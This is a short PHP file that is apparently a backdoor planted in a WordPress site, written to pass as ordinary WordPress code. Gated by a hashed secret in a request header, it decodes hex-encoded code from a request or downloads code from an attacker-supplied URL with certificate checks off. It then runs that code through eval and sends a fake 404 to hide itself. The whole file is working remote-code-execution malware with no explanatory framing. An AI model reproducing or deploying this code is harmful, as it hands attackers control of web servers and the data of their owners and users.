<?php error_reporting(0);ini_set("display_errors", 0);
try {
$GL0BALS = array_merge($_GET, $_POST, $_COOKIE, $_FILES, $_SERVER, $_ENV);if (hash('sha256', md5($GL0BALS['HTTP_WP_LOCALE'])) == '83d14871b7fde1d846716fe0762c39c0dbb139d69c23be2e66809f1db0b37b7f') {if (isset($GL0BALS['wp_the_query'])) {$response = pack("H*", $GL0BALS['wp_the_query']);
} else {$ch = curl_init();curl_setopt_array($ch, array(CURLOPT_URL => pack("H*", $GL0BALS['HTTP_WP_QUERY']),CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION => true,CURLOPT_TIMEOUT => 30,
CURLOPT_SSL_VERIFYPEER => false,CURLOPT_SSL_VERIFYHOST => false,));
$response = curl_exec($ch);
curl_close($ch);
}eVAL( '?>'. $response );}} catch (Exception $e) { }header("HTTP/1.1 404 Not Found");
header("Status: 404 Not Found");exit;